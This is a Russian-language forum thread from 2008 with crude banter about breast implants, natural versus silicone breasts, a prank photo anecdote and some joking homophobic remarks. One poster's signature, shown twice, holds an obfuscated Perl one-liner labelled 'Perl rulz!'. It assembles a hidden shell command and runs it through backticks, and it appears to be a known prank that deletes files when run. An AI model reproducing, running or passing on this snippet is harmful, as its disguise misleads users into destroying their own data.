Добавлено: Пт Ноя 21, 2008 2:01 am Заголовок сообщения:
щас буду ужосы рассказывать)
есть два вида операций, дешевые и дорогие
дорогие это когда подмышками девают разрез и туда запихивают
а дешевые это когда вскрывают соски по окружности и запихивают силикон туда _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
А кстати дя вас имеет значение силиконовые они или натуральные?
Для меня имеет значение,но немножко по другой причине.Суть не в сиськах,а в человеке,который не доволен своими сиськами.И вообще,это неестественно.Хотя,с другой стороны,кому какое дело? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
да ну блин. большие-маленькие. какая разница. главное чтобы красиво было. так что форма имхо важнее) _________________ Freedom's just another word for nothin' left to lose.
Большие сиськи к старости жостко будут выглядеть, если к старости организм будет слаб, то сиски будут перевешивать, а над старым человеком смеяться нельзя, так что много силикона это плохо! _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Фоткал Карлик.Мы с ним в одной комнате жили,когда во Львов ездили.В чуваке присутствует некая доля гомофобии,так что я ему периодически демонстрировал что-нибудь эдакое,а он злился,орал,было весело. Потом он привык.А трюки остались.В результате родились номера "Не засиживайтесь допоздна" и "Жопа на блюде".Фрагменты первого номера вы можете увидеть на фото выше.Его суть заключалась в том,чтобы таким образом напомнить людям,работавшим в здании напротив,что их смена закончилась и пора идти домой.Но скорее всего,они ничего не видели.
Фоторепортаж же с места событий второй миниатюры я думаю вам не очень охота видеть. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
на самом деле если бы у баб был член, меня бы это не смущало ) и да, можете считать меня гомосеком (если еще не считали) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
я считал с первого захода на форум, как только увидел эти глаза, полные гомосексуфлизма... _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong